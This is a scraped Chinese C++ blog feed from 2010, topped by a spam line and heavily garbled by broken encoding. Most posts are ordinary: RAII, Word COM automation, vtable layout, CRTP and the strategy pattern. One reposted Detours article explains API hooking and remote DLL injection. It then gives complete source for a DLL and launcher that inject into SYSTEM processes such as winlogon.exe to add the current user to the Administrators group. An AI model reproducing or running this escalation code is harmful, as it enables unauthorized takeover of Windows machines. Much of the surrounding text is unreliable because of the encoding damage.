久久久久AV综合网成人,久久99热只有频精品8,亚洲午夜久久久久久噜噜噜

RAII是什么？来源于金庆的专栏

codeArt — Sat, 06 Nov 2010 09:30:00 GMT

摘自《Extended STL》中�?/p>

RAII�Q�资源获取即初始�?/h1>
资源获取卛_��始化�Q�RAII, Resource Acquisition Is Initialization�Q�是指，当你获得一个资源的时候，不管�q�个资源是对象、内存、文件句柄或者其它什么，你都会在一个对象的构造函��C��获得它，�q�且在该对象的析构函��C��释放它。实现这�U�功能的�c�，我们��p��它采用了"资源获取卛_��始化�Q�RAII�Q?的方式。这��L��c�d��常被�U�Cؓ��装�c�R�?/p>
可以依据资源可变性和资源来源�q�两个特征，来对RAII�q�行分类�?/p>

资源可变�?/h2>
如果一个封装类对其实例提供额外的功能，使得其实例能被赋予新资源�Q�这个类表现出的�q�种特征即称�?可变的RAII"�Q�否则就�?不可变的RAII"�?/p>
不可变的RAII�Q�是使用��h��最��单的一�U�。说它简单，是因为在�q�种情况下，无需在封装类中提供用于指定资源的�Ҏ��--不管是新分配的资源，�q�是对其他资源进行拷贝。这�U�RAII�q�意味着�Q�类的析构函数��L��可以假定�Q�被��装的资源是有效的�?/p>
与此相反�Q�提供可变的RAII的类�Q�就需要实��C��列功能中的绝大部分，或者全部：�~�省的或者空的构造函敎ͼ�拯��构造函敎ͼ�拯��赋值操作，用于指定资源的方法。最重要的是�Q�这��L��c�d��析构函数和�Q何类似close()的方法中�Q�释放资源前�Q�都必须��被��装的资源是不是null�?/p>

资源来源

对于提供RAII的类来说�Q�第二个重要的特征是�Q�它们通过什么途径获取自己所��理的资源。以std::string��Z��表的�c�，使用的是内部初始化的RAII�Q�它��理的资�?-卛_��存中用于保存字符的缓冲区--是由它自己创建的�Q�这一资源对外永远是不可见的。与此不同的是，以std::auto_ptr��Z��表的�c�表现出外部初始化的RAII行�ؓ�Q�它所��理的资源，是��用它的客��L��序（通过另外的某�U�方式获得之后）交给它的�?/p>

内部初始化的RAII的封装类�Q�一般比较容易实玎ͼ�但是功能上也比较受限�Ӟ��因�ؓ它们获取资源的机制是预先定义好的�Q��ƈ且是固定不变的。不�q�，�q�样的类用�v来也�Ҏ��一些，或者说�Q�比较难被误用：因�ؓ客户代码几乎没有��Z��犯下能导致资源泄露的错误�?/p>

codeArt 2010-11-06 17:30 发表评论

codeArt — Thu, 30 Sep 2010 15:42:00 GMT

��M��E�序一旦部�|�即��N��旧�?
修改需求规范来适应�E�序比反�q�来做更�Ҏ��?
一个程序如果很有用�Q�那它注定要被改掉�?
一个程序如果没用，那它一定会有很好的文��?
��M��E�序里都仅仅只有10%的代码会被执行到�?
软�g会一直膨胀到耗尽所有资源�ؓ止�?
��M��一个有点�h值的�E�序里都会有臛_��一个bug�?
原型完美的程度跟审视的�h数成反比�Q�反比��g��随着涉及的资金数增大�?
软�g直到被变成��品运行至��?个月后，它最严重的问题才会被发现�?
无法��到的错误的形式无限多样�Q�而能被检��到的正好相反，被定义了的十分有限�?
修复一个错误所需要投入的努力会随着旉��成指数��增加�?
软�g的复杂度会一直增加，直到��出�l�护�q�个�E�序的�h的承受能力�?
��M��自己的程序，几个月不看，形同其他人写的�?
��M��一个小�E�序里面都有一个巨大的�E�序蠢蠢�Ʋ出�?
�~�码开始的��早�Q�花费的旉��长�?
一个粗心的��目计划会让你多�?倍的旉��d��成；一个细心的��目计划只会让你多花2倍的旉��?
往大型��目里添加�h手会佉K��目更延迟�?
一个程序至��会完成90%�Q�但永远完成不了��过95%�?
如果你想�ȝ��被自动处理掉�Q�你得到的是自动产生的麻烦�?
开发一个傻瓜都会��用的软�g�Q�只有傻瓜愿意��用它�?
用户不会真正的知道要在��Y仉��做些什么，除非使用�q��?

codeArt 2010-09-30 23:42 发表评论

c++操作word接口

codeArt — Tue, 31 Aug 2010 11:35:00 GMT

注意事项�Q?多用Range�Q�少用Selection�Q�因为Word中，Selection对象只有一个�?br>�?】开启word

_ApplicationPtr word_app;
HRESULT hr = word_app.CreateInstance("Word.Application", NULL);

�?】新��Z��个文�?br>

COleVariant vTrue((short)TRUE),vFalse((short)FALSE),vOpt((long)DISP_E_PARAMNOTFOUND, VT_ERROR);
DocumentsPtr docs;
_DocumentPtr oDoc;
docs = word_app->GetDocuments();
doc = docs->Add(vOpt, vOpt, vOpt, vOpt);

�?】设�|�文档的��面布局

PageSetupPtr page_setup = doc->GetPageSetup();
page_setup->PutTopMargin(0);
page_setup->PutBottomMargin(0);
page_setup->PutRightMargin(0);
page_setup->PutLeftMargin(0);

�?】插入文�?br>

SelectionPtr selection;
selection = word_app->GetSelection();
_ParagraphFormatPtr parafmt = selection->GetParagraphFormat();
parafmt->PutLineSpacingRule(wdLineSpaceExactly);
parafmt->PutLineSpacing(50);
_FontPtr font;
font = oSel->GetFont();
font->PutBold(1);
font->PutColor(wdColorGreen);
font->PutSize(20);
font->PutName(_T("宋体"));
selection->TypeText("ABC");
oSel->TypeParagraph();
oSel->TypeText("12345678901234567890");
oSel->TypeParagraph();

�?】插入文本框

ShapesPtr shapes = doc->GetShapes();
ShapePtr textbox = shapspp->AddTextbox(Office::msoTextOrientationHorizontal, 1, 1, 100, 100);

�?】文本框中插入文�?br>

1ShapesPtr shapes = doc->GetShapes();
2ShapePtr textbox =  shapspp->AddTextbox(Office::msoTextOrientationHorizontal, 1, 1, 100, 100);
3TextFramePtr textframe = textbox->GetTextFrame();
4RangePtr range = textframe->GetTextRange();
5long insert_before_count = range->Characters->GetCount();
6range->InsertAfter("TEXT");
7if (insert_before_count != 1)
8    range->MoveStart(COleVariant((long)Word::wdCharacter), COleVariant(insert_before_count-1));
9if(range != 0)
10{
11    _FontPtr font = range->GetFont();
12    font->PutBold(isBold);
13    font->PutItalic(isItalic);
14    font->PutColor((Word::WdColor)FontColor());
15    font->PutSize(FontSize);
16    font->PutName(FontType().c_str());
17}

�?】设�|�文本框的属�?br>

1textbox->GetTextFrame()->PutAutoSize(Office::msoAutoShape);
2textbox->GetTextFrame()->PutMarginBottom(0);
3textbox->GetTextFrame()->PutMarginTop(0);
4textbox->GetTextFrame()->PutMarginLeft(0);
5textbox->GetTextFrame()->PutMarginRight(0);
6textbox->GetLine()->PutVisible(Office::msoFalse);
7textbox->GetFill()->PutTransparency(1);

�?】插入图片，�q�里需要注意，必须得先用InlineShape,�q�样可以把图片插入到指定的页中，不然�Q�所有的囄��只在�W�一��c�?br>

1ShapesPtr shapes = m_WordDoc->GetShapes();
2InlineShapesPtr inline_shapes = selection_doc->GetRange()->GetInlineShapes();
3InlineShapePtr inline_shape = inline_shapes->AddPicture(“picture_path”, COleVariant((long)0), COleVariant((long)1));
4ShapePtr shape = inline_shape->ConvertToShape();
5shape->PutWidth(width);
6shape->PutHeight(hehight());
7shape->PutTop(Y);
8shape->PutLeft(X);
9if(shape->GetType() == Office::msoPicture)
10{
11 Word::WrapFormatPtr wrapp = shape->GetWrapFormat();
12 wrapp->PutType(Word::wdWrapBehind);
13}
14

�?】插入直�U?br>

1ShapesPtr shapes = doc->GetShapes();
2Word::ShapePtr line = shapes->AddLine(x1,y1, x2,y2);
3if (line->GetType() == Office::msoLine)
4{
5 Word::LineFormatPtr LineFmt = line->GetLine();
6 LineFmt->PutWeight(lr->weight_);
7}

�?0】插入分隔符

selection->InsertBreak(COleVariant((long)wdColumnBreak));
selection->InsertBreak(COleVariant((long)wdSectionBreakContinuous));
selection->InsertBreak(COleVariant((long)wdPageBreak));

�?1】设�|�栏目个数和栏目的宽�?br>�q�里一定要注意add函数的逻辑

1SectionsPtr word_sections = doc->GetSections();
2long num = word_sections->GetCount();
3SectionPtr word_section = word_sections->Item(num-1);
4PageSetupPtr page_setup = word_section->GetPageSetup();
5TextColumnsPtr text_cols = page_setup>GetTextColumns();
6text_cols->PutEvenlySpaced(0);
7text_cols->Add(COleVariant(col_width), COleVariant((long)0), COleVariant((long)false));

�?2】插入表�?br>

1TablesPtr tables = oSel->GetTables();
2TablePtr table = tables->Add(oSel->GetRange(), 2, 5);
3
4BordersPtr bords = table->GetBorders();
5bords->PutOutsideLineStyle(wdLineStyleSingle);
6bords->PutInsideLineStyle(wdLineStyleSingle);
7for (int i = 1; i<=2; i++)
8{
9    for (int j = 1; j<=5; j++)
10    {
11        table->Cell(i,j)->GetRange()->PutText("20");
12    }
13}
14
15CellPtr cell = table->Cell(1,1);
16cell->Merge(table->Cell(1,2));

�?3】保存文��ƈ退�?br>

1COleVariant vTrue((short)TRUE),vFalse((short)FALSE),vOpt((long)DISP_E_PARAMNOTFOUND, VT_ERROR);
2_DocumentPtr active_doc;
3active_doc = word_app->GetActiveDocument();
4active_doc->SaveAs(COleVariant("D:\\doc1.doc"),
5                   COleVariant((short)0),
6                   vFalse, COleVariant(""), vTrue, COleVariant(""),
7                   vFalse, vFalse, vFalse, vFalse, vFalse);
8word_app->Quit(vOpt, vOpt, vOpt);

在word优秀的构架中�q�有许许多多的接口，上面只是举例实现一个普通的文��Q�希望对大家有用�?

codeArt 2010-08-31 19:35 发表评论

codeArt — Mon, 30 Aug 2010 17:32:00 GMT

1class base
2{
3public:
4    base(){};
5    ~base(){};
6
7    virtual void func1(){printf("base::func1\r\n");};
8    virtual void func2(){printf("base::func2\r\n");};
9    int ma;
10    int mb;
11    void member_func(){printf("base::member_func\r\n");}
12};
13
14class derive : public base
15{
16public:
17    derive(){};
18    ~derive(){};
19
20    virtual void func1(){printf("derive::func1\r\n");};
21    virtual void func3(){printf("derive::func3\r\n");};
22    virtual void func4(){printf("derive::func4\r\n");};
23
24    int ma2;
25    int mb2;
26
27    void member_func2(){printf("derive::member_func2\r\n");}
28};
29
30class derive2 : public derive
31{
32public:
33    derive2(){};
34    ~derive2(){};
35
36    virtual void func3(){printf("derive2::func3\r\n");};
37    virtual void func4(){printf("derive2::func4\r\n");};
38    virtual void func5(){printf("derive2::func5\r\n");};
39
40    int ma3;
41    int mb3;
42
43    void member_func3(){printf("derive2::member_func3\r\n");}
44};
45int _tmain(int argc, _TCHAR* argv[])
46{
47    typedef void (*Fun)(void);
48
49    Fun pfun = 0;
50    derive2* d2 = new derive2;
51    int* p = (int*)d2;
52    *(p+1) = 20;
53    *(p+2) = 30;
54    *(p+3) = 200;
55    *(p+4) = 300;
56    *(p+5) = 2000;
57    *(p+6) = 30000;
58
59    for (int i = 0; i<5; i++)
60    {
61        Fun pfun = (Fun)*((int*)*(p+0)+i);
62        if (pfun)
63            pfun();
64        else
65            printf("null\r\n");
66     }
67
68    base* b2 = new derive;
69    int* p2 = (int*)b2;
70    pfun = (Fun)*((int*)*(p2+0)+3);
71    pfun();
72
73    return 0;
74}
75

codeArt 2010-08-31 01:32 发表评论

关于Detours[转]

codeArt — Sun, 29 Aug 2010 15:08:00 GMT

Detours是微软开发的一个函数库�Q�源代码可在http://research.microsoft.com/sn/detours 免费获得�Q? 用于修改�q�行中的�E�序在内存中的媄像，从而即使没有源代码也能改变�E�序的行为。具体用途是�Q?br style="LINE-HEIGHT: normal">
拦截WIN32 API调用�Q�将其引导到自己的子�E�序�Q�从而实现WIN32 API的定制�?br style="LINE-HEIGHT: normal">��Z��个已在运行的�q�程创徏一新线�E�，装入自己的代码�ƈ�q�行�?br style="LINE-HEIGHT: normal">本文��简介Detours的原理，Detours库函数的用法�Q?�q�利用Detours库函数在Windows NT上编写了一个程序，该程序能使有“调试�E�序”的用��h��限的用户成�ؓ�pȝ��理员，附录利用Detours库函��C��改该�E�序使普通用户即可成为系�l�管理员�Q�在NT4 SP3上）�?br style="LINE-HEIGHT: normal">
一�Q?Detours的原�?br style="LINE-HEIGHT: normal">
1�Q?WIN32�q�程的内存管�?br style="LINE-HEIGHT: normal">
��L��周知�Q�WINDOWS NT实现了虚拟存储器�Q�每一WIN32�q�程拥有4GB的虚存空��_�� 关于WIN32�q�程的虚存结构及其操作的具体�l�节请参阅WIN32 API手册�Q?以下仅指��Z��Detours相关的几点：

(1) �q�程要执行的指��o也放在虚存空间中
(2) 可以使用QueryProtectEx函数把存放指令的��面的权限更改�ؓ可读可写可执行，再改写其内容�Q�从而修�Ҏ��在运行的�E�序
(3) 可以使用VirtualAllocEx从一个进�E��ؓ另一正运行的�q�程分配虚存�Q�再使用 QueryProtectEx函数把页面的权限更改为可��d��写可执行�Q��ƈ把要执行的指令以二进制机器码的�Ş式写入，从而�ؓ一个正在运行的�q�程注入��L��的代�?br style="LINE-HEIGHT: normal">
2�Q?拦截WIN32 API的原�?br style="LINE-HEIGHT: normal">
Detours定义了三个概念：

(1) Target函数�Q�要拦截的函敎ͼ�通常为Windows的API�?br style="LINE-HEIGHT: normal">(2) Trampoline函数�Q�Target函数的复制品。因为Detours��会改写Target函数�Q�所以先把Target函数复制保存好，一斚w��仍然保存Target函数的过�E�调用语义，另一斚w��便于以后的恢复�?br style="LINE-HEIGHT: normal">(3) Detour 函数�Q�用来替代Target函数的函数�?br style="LINE-HEIGHT: normal">
Detours在Target函数的开头加入JMP Address_of_ Detour_ Function指��o�Q�共5个字节）把对Target函数的调用引导到自己的Detour函数�Q?把Target函数的开头的5个字节加上JMP Address_of_ Target _ Function+5作�ؓTrampoline函数。例子如下：

拦截前：Target _ Function�Q?br style="LINE-HEIGHT: normal">�Q�Target函数入口�Q�以下�ؓ假想的常见的子程序入口代�?br style="LINE-HEIGHT: normal">push   ebp
mov   ebp,   esp
push   eax
push   ebx
Trampoline:
�Q�以下是Target函数的��l�部�?br style="LINE-HEIGHT: normal">……

拦截后： Target _ Function�Q?br style="LINE-HEIGHT: normal">jmp   Detour_Function
Trampoline:
�Q�以下是Target函数的��l�部�?br style="LINE-HEIGHT: normal">……

Trampoline_Function:
; Trampoline函数入口, 开头的5个字节与Target函数相同
push   ebp
mov   ebp,   esp
push   eax
push   ebx
�Q�蟩回去�l�箋执行Target函数
jmp   Target_Function+5
3�Q?��Z��个已在运行的�q�程装入一个DLL

以下是其步骤�Q?br style="LINE-HEIGHT: normal">
(1) 创徏一个ThreadFuction�Q�内容仅是调用LoadLibrary�?br style="LINE-HEIGHT: normal">(2) 用VirtualAllocEx��Z��个已在运行的�q�程分配一片虚存，�q�把权限更改为可��d��写可执行�?br style="LINE-HEIGHT: normal">(3) 把ThreadFuction的二�q�制机器码写入这片虚存�?br style="LINE-HEIGHT: normal">(4) 用CreateRemoteThread在该�q�程上创��Z��个线�E�，传入前面分配的虚存的起始地址作�ؓ�U�程函数的地址�Q�即可�ؓ一个已在运行的�q�程装入一个DLL。通过DllMain 卛_��在一个已在运行的�q�程中运行自��q��代码�?br style="LINE-HEIGHT: normal">
二． Detours库函数的用法

因�ؓDetours软�g包�ƈ没有附带帮助文�g�Q�以下接口仅从剖析源代码得出�?br style="LINE-HEIGHT: normal">
1�Q?PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

功能�Q�从一DLL中找��Z��函数的入口地址
参数�Q�pszModule是DLL名，pszFunction是函数名�?br style="LINE-HEIGHT: normal">�q�回�Q�名为pszModule的DLL的名为pszFunction的函数的入口地址
说明�Q�DetourFindFunction除��用GetProcAddress外，�q�直接分析DLL的文件头�Q�因此可以找��C��些GetProcAddress找不到的函数入口�?br style="LINE-HEIGHT: normal">
2�Q?DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
功能�Q�该宏把名�ؓtarget_name 的Target函数生成Trampoline函数�Q�以后调�?trampoline_prototype在语义上�{�于调用Target函数�?br style="LINE-HEIGHT: normal">
3�Q?BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
功能�Q�用Detour 函数拦截Target函数
参数�Q�pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype�Q�pbDetour�?Detour 函数的入口地址�?br style="LINE-HEIGHT: normal">
4�Q?BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
功能�Q�恢复Target函数
参数�Q�pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype�Q�pbDetour�?Detour 函数的入口地址�?br style="LINE-HEIGHT: normal">
5�Q?BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
功能�Q��ؓ一个已在运行的�q�程装入一个DLL
参数�Q�hProcess是进�E�的句柄�Q�lpDllName是要装入的DLL�?br style="LINE-HEIGHT: normal">
三． �E�序实例

以一个能使有“调试�E�序”的用��h��限的用户成�ؓ�pȝ��理员的�E�序做例子说明Detours 库函数的用法。程序的设计思�\是找一个以System帐号�q�行的进�E�，如spoolss.exe, rpcss.exe, winlogon.exe, service.exe�{�，使用ContinueProcessWithDll在其中注入把当前用户加入�?Administrators本地�l�的DLL�Q�因��DLL在这些进�E�的安全上下文环境运行，所以有相应的权限�?br style="LINE-HEIGHT: normal">
先编写相应的DLL�Q?br style="LINE-HEIGHT: normal">
/*admin.dll, 当进�E�装入时会把名�ؓszAccountName
的用户加入到Administrators本地�l��?/

#include
#include
#include
#include

/*以下创徏一�׃�n�D�实现进�E�间的数据通讯�Q?br style="LINE-HEIGHT: normal">szAccountName 是用户名�Q�bPrepared说明
szAccountName是否已初始化�?/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*�E�序调用SetAccountName讄��要加入到Administrators
本地�l�的用户名，�q��知DllMain
已初始化szAccountName �Q?br style="LINE-HEIGHT: normal">以后被装入时可调用ElevatePriv */

__declspec(dllexport) VOID WINAPI
SetAccountName(wchar_t *Name)
{
    wcscpy(szAccountName,Name);
    bPrepared=TRUE;
}

/*把名为szAccountName的用户加�?br style="LINE-HEIGHT: normal">到Administrators本地�l?/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname=szAccountName;
    NetLocalGroupAddMembers(NULL,L"Administrators",
        3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
        DWORD dwReason, PVOID lpReserved)
{
    switch (dwReason) {
   case DLL_THREAD_ATTACH:
       if (bPrepared)
           ElevatePriv();
    }
    return TRUE;
}

�E�序如下�Q?br style="LINE-HEIGHT: normal">
/*AddMeToAdministrators.exe 把当前用户加入到
Administrators本地�l�。��用方法�ؓ�Q�（1�Q?br style="LINE-HEIGHT: normal">�q�行��d��理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的进�E�ID �Q?�Q�执行AddMeToAdministrators.exe procid, 其中procid为（1�Q�记下的�q�程ID �Q?�Q�签退再签刎ͼ��q�行用户��理器，卛_��发现自己已在Administrators本地�l�中�?/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用户名�U?/

void GetCurrentUser(wchar_t *szName)
{
    HANDLE hProcess, hAccessToken;
    wchar_t InfoBuffer[1000],szAccountName[200],
        szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200,
        dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = GetCurrentProcess();

    OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

    GetTokenInformation(hAccessToken,TokenUser,
        InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid,
        szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);
    wcscpy(szName,szDomainName);
    wcscat(szName,L"\");
        wcscat(szName,szAccountName);
}

/* EnablePrivilege启用自己�?#8220;调试�E�序”的用��h��?/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, szPrivName,
        &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
    AdjustTokenPrivileges(hToken, FALSE, &tp,
        sizeof(tp), NULL, NULL);
    return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
                   LPSTR lpszCmdLine, int
                   nCmdShow)
{
    INT argc;
    WCHAR **argv;
    argv = CommandLineToArgvW(GetCommandLineW(),
        &argc);
    INT nProcessId = -1;
    if (argc!=2){
        wprintf(L"usage %s pid", argv[0]);
        return 1;
    }
    nProcessId = _wtoi(argv[1]);
    printf("%d ",nProcessId);
    /*要成功执行ContinueProcessWithDll�Q�要对winlogon.exe�{�进�E�的�q�程句柄有读写存储器内容和创建线�E�的权限�Q�EnablePrivilege使本�q�程有这��L��权利�?/

    if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
        printf("AdjustTokenPrivilege Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    HANDLE   gNewHandle =
        OpenProcess(PROCESS_ALL_ACCESS
        , TRUE, nProcessId);
    if (!gNewHandle){
        printf("OpenProcess Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    wchar_t szName[100];
    GetCurrentUser(szName);
    SetAccountName(szName);
    If (!ContinueProcessWithDll(gNewHandle,
        L"c:\temp\admin.dll")) {
            printf("ContinueProcessWithDll failed %u",
                (UINT)GetLastError());
            return 3;
    }
    return 0;
}
因�ؓ“调试�E�序”的用��h��限缺省情况下仅赋予给��理员，因此�q�不会造成安全漏洞。但该程序揭�C�出“调试�E�序”的用��h��限其实是至高无上的用��h��限，只能授予�l�可信用戗��?br style="LINE-HEIGHT: normal">
四． �l�论      Detours是一强大的工��P��提供了简单易用的函数接口来拦截WIN32 API调用和�ؓ一个已在运行的�q�程装入一个DLL�?/span>

codeArt 2010-08-29 23:08 发表评论

QT中的插�g

codeArt — Sat, 28 Aug 2010 11:56:00 GMT

摘要: QT有着独特的插件管理方法便于��?调理清晰.完全可以替代WIN32下的动态库,静态库.不过,QT也支持动态库和静态库加蝲 .见QLibrary,最�l?QLibrary调用WIN32下的LoadLibrary,GetProcAddress函数. Qt插�g的��用方�? [1]project_main_1工程中定义接�?class interface__1{publ... 阅读全文

codeArt 2010-08-28 19:56 发表评论

codeArt — Sat, 28 Aug 2010 08:15:00 GMT

之前写blog只是备忘,看了一些很好的技术文章之�?很是��慕.从现在开�?好好的维护这个blog�?

codeArt 2010-08-28 16:15 发表评论

codeArt — Fri, 27 Aug 2010 13:02:00 GMT

#include 

using namespace std;

template 
class Base {
public:
	void fun() {
		cout << "Base::fun" << endl;
	}

	void doSomething() {
		T* pT = static_cast(this);
		pT->fun();
	}
};

class Drive : public Base {
public:
	void fun() {
		cout << "Drive::fun" << endl;
	}
};

class MostDrive : public Drive {
public:
	void fun() {
		cout << "MostDrive::fun" << endl;
	}
};

int main() {
	MostDrive obj;
	obj.doSomething();

	return 0;
}

codeArt 2010-08-27 21:02 发表评论

c++重蝲->

codeArt — Fri, 27 Aug 2010 12:46:00 GMT

#include 

using namespace std;

class Inner {
public:
	void Fun() {
		cout << "Inner::Fun" << endl;
	}
};

class Outer {
private:
	Inner* m_pInner;

public:
	Outer(Inner* p_pInner) : m_pInner(p_pInner) {
	}

	Inner* operator -> () {
		return m_pInner;
	}
};

int main() {
	Inner objInner;
	Outer objOuter(&objInner);

	objOuter->Fun();

	return 0;
}

codeArt 2010-08-27 20:46 发表评论

�{�略模式c++表述备忘

codeArt — Fri, 27 Aug 2010 12:43:00 GMT

#include 

using namespace std;

class Round1 {
public:
	void Play() {
		cout << "Round1::Play" << endl;
	}
};

class Round2 {
public:
	void Play() {
		cout << "Round2::Play" << endl;
	}
};

template 
class Strategy {
private:
	T objT;
public:
	void Play() {
		objT.Play();
	}
};

int main() {
	Strategy obj1;
	Strategy obj2;

	obj1.Play();
	obj2.Play();

	return 0;
}

codeArt 2010-08-27 20:43 发表评论